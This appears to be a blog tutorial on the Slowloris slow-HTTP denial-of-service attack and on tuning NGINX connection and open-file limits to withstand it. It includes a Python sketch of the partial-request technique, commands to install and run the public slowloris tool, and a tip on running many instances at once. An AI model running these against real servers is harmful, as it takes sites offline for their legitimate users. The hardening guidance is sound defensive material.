Slowloris DoS Attack and Mitigation on NGINX Web Server
1. Introduction
The Slowloris DoS attack lets an attacker take down a web server in under five minutes using nothing more than a modest personal laptop. The whole idea behind the technique is to use HTTP GET requests to occupy all available HTTP connections permitted on a web server.
Technically, NGINX is not affected by this attack, since NGINX doesn’t rely on threads to handle requests; instead it uses a much more scalable event-driven (asynchronous) architecture. However, as we will see later in this article, in practice the default configurations can make an NGINX web server “vulnerable” to Slowloris.
In this article, we are going to take a look at this attack technique and some ways to mitigate it on NGINX.
2. Slowloris DoS Attack
From acunetix:
A Slow HTTP Denial of Service (DoS) attack, otherwise referred to as Slowloris HTTP DoS attack, makes use of HTTP GET requests to occupy all available HTTP connections permitted on a web server.
A Slow HTTP DoS Attack takes advantage of a vulnerability in thread-based web servers which wait for entire HTTP headers to be received before releasing the connection. While some thread-based servers such as Apache make use of a timeout to wait for incomplete HTTP requests, the timeout, which is set to 300 seconds by default, is re-set as soon as the client sends additional data.
This creates a situation where a malicious user could open several connections on a server by initiating an HTTP request but does not close it. By keeping the HTTP request open and feeding the server bogus data before the timeout is reached, the HTTP connection will remain open until the attacker closes it. Naturally, if an attacker had to occupy all available HTTP connections on a web server, legitimate users would not be able to have their HTTP requests processed by the server, thus experiencing a denial of service.
This enables an attacker to restrict access to a specific server with very low utilization of bandwidth. This breed of DoS attack is starkly different from other DoS attacks such as SYN flood attacks which misuse the TCP SYN (synchronization) segment during a TCP three-way-handshake.
How it works
An analysis of an HTTP GET request helps further explain how and why a Slow HTTP DoS attack is possible. A complete HTTP GET request resembles the following.
GET /index.php HTTP/1.1[CRLF]
Pragma: no-cache[CRLF]
Cache-Control: no-cache[CRLF]
Host: testphp.vulnweb.com[CRLF]
Connection: Keep-alive[CRLF]
Accept-Encoding: gzip,deflate[CRLF]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36[CRLF]
Accept: */*[CRLF][CRLF]
Something of particular interest is the [CRLF] in the GET request above. Carriage Return Line Feed (CRLF) is a non-printable character sequence used to denote the end of a line. Similar to text editors, an HTTP request contains a [CRLF] at the end of a line to start a fresh line, and two [CRLF] sequences (i.e. [CRLF][CRLF]) to denote a blank line. The HTTP protocol defines a blank line as the completion of a header. A Slow HTTP DoS takes advantage of this by never sending the finishing blank line to complete the HTTP header.
To make matters worse, a Slow HTTP DoS attack is not commonly detected by Intrusion Detection Systems (IDS), since the attack does not contain any malformed requests. The HTTP request will seem legitimate to the IDS, which will pass it on to the web server.
Perform a Slowloris DoS Attack
Performing a Slowloris DoS Attack is a piece of cake nowadays. We can easily find a lot of implementations of the attack hosted on GitHub with a simple Google search.
For demonstration, we can use a Python implementation of Slowloris to perform an attack.
How this code works
This implementation works like this:
- We start making lots of HTTP requests.
- We send headers periodically (every ~15 seconds) to keep the connections open.
- We never close the connection unless the server does so. If the server closes a connection, we create a new one and keep doing the same thing.
This exhausts the server’s thread pool, and the server can’t accept requests from other people.
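The steps above can be sketched in a few lines of Python. This is a simplified, hypothetical sketch of the technique, not the actual slowloris.py code (the function names and header values here are our own):

```python
import random
import socket

def partial_request(host, token):
    """Build a deliberately incomplete HTTP request: the header block is
    never terminated by the blank line (CRLF CRLF), so the server keeps
    the connection open, waiting for the rest of the headers."""
    return (f"GET /?{token} HTTP/1.1\r\n"
            f"Host: {host}\r\n"
            "User-Agent: Mozilla/5.0\r\n").encode()

def open_slow_connection(host, port=80):
    """Open a socket and send only the partial request."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.send(partial_request(host, random.randint(0, 10**6)))
    return s

def keep_alive(sock):
    """Send one more bogus header to reset the server's header timeout."""
    sock.send(f"X-a: {random.randint(1, 5000)}\r\n".encode())
```

An attack loop would open many such connections and call `keep_alive` on each of them every ~15 seconds, reopening any that the server drops.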
How to install and run this code
You can clone the git repo or install using pip. Here’s how we run it.
$ sudo pip3 install slowloris
$ slowloris example.com
That’s it. We are performing a Slowloris attack on example.com!
If you want to clone using git instead of pip, here’s how you do it.
git clone https://github.com/gkbrk/slowloris.git
cd slowloris
python3 slowloris.py example.com
By default, slowloris.py will try to keep 150 open connections to the target web server; you can change this number with the command line argument “-s 1000”. However, because this code sends keep-alive messages for one connection after another (not in parallel), some connections get timed out and disconnected by the target server before their turn to receive a keep-alive message comes around. The result is that, in practice, an instance of slowloris.py can only keep about 50-100 open connections to the target.
We can work around this limitation by opening multiple instances of slowloris.py, with each trying to keep 50 open connections. That way, we can keep thousands of connections open with only one computer.
3. Preventing and Mitigating Slowloris (a.k.a. Slow HTTP) DoS Attacks in NGINX
Slowloris works by opening a lot of connections to the target web server and keeping those connections open by periodically sending keep-alive messages on each connection. Understanding this, we can come up with several ways to mitigate the attack.
Technically, Slowloris only affects thread-based web servers such as Apache, while leaving event-driven (asynchronous) web servers like NGINX unaffected. However, the default configurations of NGINX can make NGINX vulnerable to this attack.
Identify the attack
First of all, to see if our web server is under attack, we can list the connections to port 80 by running the following command:
$ netstat -nalt | grep :80
The output will look like this:
tcp        0      0 0.0.0.0:80           0.0.0.0:*              LISTEN
tcp        0      0 10.128.0.2:48406     169.254.169.254:80     ESTABLISHED
tcp        0      0 10.128.0.2:48410     169.254.169.254:80     ESTABLISHED
tcp        0      0 10.128.0.2:48396     169.254.169.254:80     CLOSE_WAIT
tcp        0      0 10.128.0.2:48398     169.254.169.254:80     CLOSE_WAIT
tcp        0      0 10.128.0.2:48408     169.254.169.254:80     ESTABLISHED
tcp        0      0 10.128.0.2:48400     169.254.169.254:80     CLOSE_WAIT
We can further filter only the open connections by running the following command:
$ netstat -nalt | grep :80 | grep ESTA
The output will look like:
tcp        0      0 10.128.0.2:48406     169.254.169.254:80     ESTABLISHED
tcp        0      0 10.128.0.2:48410     169.254.169.254:80     ESTABLISHED
tcp        0      0 10.128.0.2:48408     169.254.169.254:80     ESTABLISHED
We can also count the open connections by adding -c to the end of the above command:
$ netstat -nalt | grep :80 | grep ESTA -c
The output will be the number of connections in the filtered result:
3
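If netstat is not available, the same count can be obtained by parsing /proc/net/tcp directly. A minimal sketch (the parsing logic here is our own; in this file the addresses are hex-encoded "IP:PORT" pairs and state code 01 means ESTABLISHED):

```python
def count_established(proc_net_tcp_text, port):
    """Count ESTABLISHED sockets bound to `port`, given the text
    contents of /proc/net/tcp."""
    count = 0
    for line in proc_net_tcp_text.splitlines()[1:]:  # skip the header row
        fields = line.split()
        if len(fields) < 4:
            continue
        local_addr, state = fields[1], fields[3]
        # local_addr looks like "0100007F:0050": hex IP, then hex port
        if state == "01" and int(local_addr.split(":")[1], 16) == port:
            count += 1
    return count

# Usage on a live Linux box:
# with open("/proc/net/tcp") as f:
#     print(count_established(f.read(), 80))
```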
How is NGINX vulnerable to Slowloris?
NGINX can be vulnerable to Slowloris in several ways:
- Config #1: By default, NGINX limits the number of connections accepted by each worker process to 768.
- Config #2: Default number of open connections limited by the system is too low.
- Config #3: Default number of open connections limited for nginx user (usually www-data) is too low.
- Config #4: By default, NGINX itself limits the number of open files for each of its worker processes to no more than 1024.
For example, let’s say we run NGINX on a 2-core CPU server, with default configurations.
- Config #1: NGINX will run with 2 worker processes, which can handle up to 768 x 2 = 1536 connections.
- Config #2: Default number of open connections limited by the system: soft limit = 1024, hard limit = 4096.
- Config #3: Default number of open connections limited for nginx user (usually www-data): soft limit = 1024, hard limit = 4096.
- Config #4: By default, NGINX itself limits the number of open files for each of its worker processes to no more than 1024.
Therefore NGINX can handle at most 1024 connections, the minimum of the four limits above. Since each instance of slowloris.py can hold about 50 connections open in practice, it would take only about 20 instances to take the server down. Wow!
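The arithmetic above is just taking the minimum of the four limits; a quick back-of-the-envelope check (all numbers are the example defaults from this section):

```python
# The effective connection capacity is the minimum of the four limits.
worker_connections = 768 * 2   # Config #1: per-worker limit x 2 workers
system_file_max    = 200_000   # Config #2: fs.file-max (2 GB RAM example)
user_open_files    = 1024      # Config #3: www-data soft limit
nginx_open_files   = 1024      # Config #4: NGINX worker open-file limit

capacity = min(worker_connections, system_file_max,
               user_open_files, nginx_open_files)
print(capacity)          # 1024

# Each slowloris.py instance holds roughly 50 connections in practice.
print(capacity // 50)    # ~20 instances needed
```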
Mitigation
We can mitigate the attack with network-level approaches such as:
- Limiting the number of connections from one IP
- Lowering the timeout for each HTTP connection
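For reference, both of these network-level mitigations map to real NGINX directives. A sketch of what they look like in nginx.conf (the zone name and the values here are illustrative, not tuned recommendations):

```
http {
    # Limit concurrent connections per client IP
    limit_conn_zone $binary_remote_addr zone=peraddr:10m;

    server {
        limit_conn peraddr 10;         # at most 10 concurrent connections per IP
        client_header_timeout 10s;     # give up on clients that send headers slowly
        client_body_timeout   10s;     # likewise for slow request bodies
    }
}
```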
However, by using proxies (such as the Tor network) to make connections appear to come from different IPs, the attacker can easily bypass these network-level defenses. After that, 1024 connections is something that is pretty easy to achieve.
Therefore, to protect NGINX from this type of attack, we should optimize the default configurations mentioned above.
Config #1: NGINX worker connections limit
Open the NGINX configuration file, usually located at /etc/nginx/nginx.conf, and change this setting:
events {
    worker_connections 768;
}
to something larger like this:
events {
    worker_connections 100000;
}
This setting tells NGINX to allow each of its worker processes to handle up to 100k connections.
Config #2: system open file limit
Even though we told NGINX to allow each of its worker processes to handle up to 100k connections, the number of connections may be further limited by the system open file limit.
To check the current system file limit:
$ cat /proc/sys/fs/file-max
Normally this number would be around 10% of the system’s memory, i.e. if our system has 2GB of RAM, this number will be about 200k, which should be enough. However, if this number is too small, we can increase it. Open /etc/sysctl.conf and change the following line (or add it if it’s not already there):
fs.file-max = 500000
Apply the setting:
$ sudo sysctl -p
Check the setting again:
$ cat /proc/sys/fs/file-max
The output should be:
fs.file-max = 500000
Config #3: user’s open file limit
Besides the system-wide open file limit mentioned in Config #2, Linux systems also limit the number of open files per user. By default, NGINX worker processes run as the www-data or nginx user, and are therefore bound by this limit.
To check the current limit for NGINX’s user (www-data in the example below), first we need to switch to the www-data user:

$ sudo su - www-data -s /bin/bash

By default, the www-data user is not given a login shell, so to run commands as www-data we must supply a shell via the -s argument; here we use /bin/bash.
After switching to the www-data user, we can check that user’s open file limit:
$ ulimit -n
To check the hard limit:
$ ulimit -Hn
To check the soft limit:
$ ulimit -Sn
By default, the soft limit is 1024 and the hard limit is 4096, which is too small to survive a Slowloris attack.
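These checks can also be done programmatically. On Linux, Python’s standard resource module exposes the same numbers as ulimit -Sn and ulimit -Hn for the current process:

```python
import resource

# Soft and hard open-file limits for the current process,
# the programmatic equivalent of `ulimit -Sn` / `ulimit -Hn`.
soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)
print(f"soft={soft} hard={hard}")
```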
To increase this limit, open /etc/security/limits.conf and add the following lines (remember to switch back to a sudo-capable user so that we can edit the file):
*        soft nofile 102400
*        hard nofile 409600
www-data soft nofile 102400
www-data hard nofile 409600
A note for RHEL/CentOS/Fedora/Scientific Linux users
For these systems, we will have to do an extra step for the limit to take effect. Edit the /etc/pam.d/login file and add/modify the following line (make sure the module name is spelled pam_limits.so):
session required pam_limits.so
then save and close the file.
The user must log out and log back in for the settings to take effect.
After that, run the above checks to see if the new soft limit and hard limit have been applied.
Config #4: NGINX’s worker number of open files limit
Even when the ulimit -n command for www-data returns 102400, the NGINX worker process’s open file limit is still 1024.
To verify the limit applied to the running worker process, first we need to find the process id of the worker process by listing the running worker processes:
$ ps aux | grep nginx
root      1095  0.0  0.0  85880  1336 ?   Ss  18:30  0:00 nginx: master process /usr/sbin/nginx
www-data  1096  0.0  0.0  86224  1764 ?   S   18:30  0:00 nginx: worker process
www-data  1097  0.0  0.0  86224  1764 ?   S   18:30  0:00 nginx: worker process
www-data  1098  0.0  0.0  86224  1764 ?   S   18:30  0:00 nginx: worker process
www-data  1099  0.0  0.0  86224  1764 ?   S   18:30  0:00 nginx: worker process
then take one of the process ids (e.g. 1096 in the above example output), and then check the limit currently applied to the process (remember to change 1096 to the right process id in your server):
$ cat /proc/1096/limits
Limit                     Soft Limit           Hard Limit           Units
Max cpu time              unlimited            unlimited            seconds
Max file size             unlimited            unlimited            bytes
Max data size             unlimited            unlimited            bytes
Max stack size            8388608              unlimited            bytes
Max core file size        0                    unlimited            bytes
Max resident set          unlimited            unlimited            bytes
Max processes             15937                15937                processes
Max open files            1024                 4096                 files
Max locked memory         65536                65536                bytes
Max address space         unlimited            unlimited            bytes
Max file locks            unlimited            unlimited            locks
Max pending signals       15937                15937                signals
Max msgqueue size         819200               819200               bytes
Max nice priority         0                    0
Max realtime priority     0                    0
Max realtime timeout      unlimited            unlimited            us
You can see that the max open files is still 1024:
Max open files 1024 4096 files
That is because NGINX itself also limits the number of open files by default to 1024.
To change this, open the NGINX configuration file (/etc/nginx/nginx.conf) and add/edit the following line:
worker_rlimit_nofile 102400;
Make sure that this line is placed at the top level of the configuration and not nested inside the events block like worker_connections.
The final nginx.conf would look something like this:
user www-data;
worker_processes auto;
pid /run/nginx.pid;
worker_rlimit_nofile 102400;

events {
    worker_connections 100000;
}
...
Restart NGINX, then verify the limit applied to the running worker process again. The Max open files value should now be 102400.
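Rather than eyeballing the /proc/&lt;pid&gt;/limits output, this check can be scripted. A small sketch (the parsing is our own, based on the fixed-width format shown above):

```python
def max_open_files(limits_text):
    """Extract the (soft, hard) 'Max open files' values from the text
    of /proc/<pid>/limits."""
    for line in limits_text.splitlines():
        if line.startswith("Max open files"):
            fields = line.split()
            # "Max open files <soft> <hard> files" -> fields[3], fields[4]
            return int(fields[3]), int(fields[4])
    raise ValueError("'Max open files' row not found")

# Usage against a live worker process (replace 1096 with the real pid):
# with open("/proc/1096/limits") as f:
#     print(max_open_files(f.read()))
```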
Congratulations! Now your NGINX server can survive a Slowloris attack. You could argue that the attacker can still open more than 100k connections to take down the target web server, but at that point it becomes more of a generic DDoS attack than a Slowloris attack specifically.
Conclusions
Slowloris is a clever technique that allows an attacker to use very limited resources to perform a DoS attack on a web server. Technically, NGINX servers are not vulnerable to this attack, but the default configurations make them so. By tuning those default configurations, we can mitigate the attack.
If you haven’t checked your NGINX server for this type of attack, you should do it now, because tomorrow, who knows, a curious high school kid might perform a Slowloris attack (“for educational purposes”) from his laptop and take down your server. 😀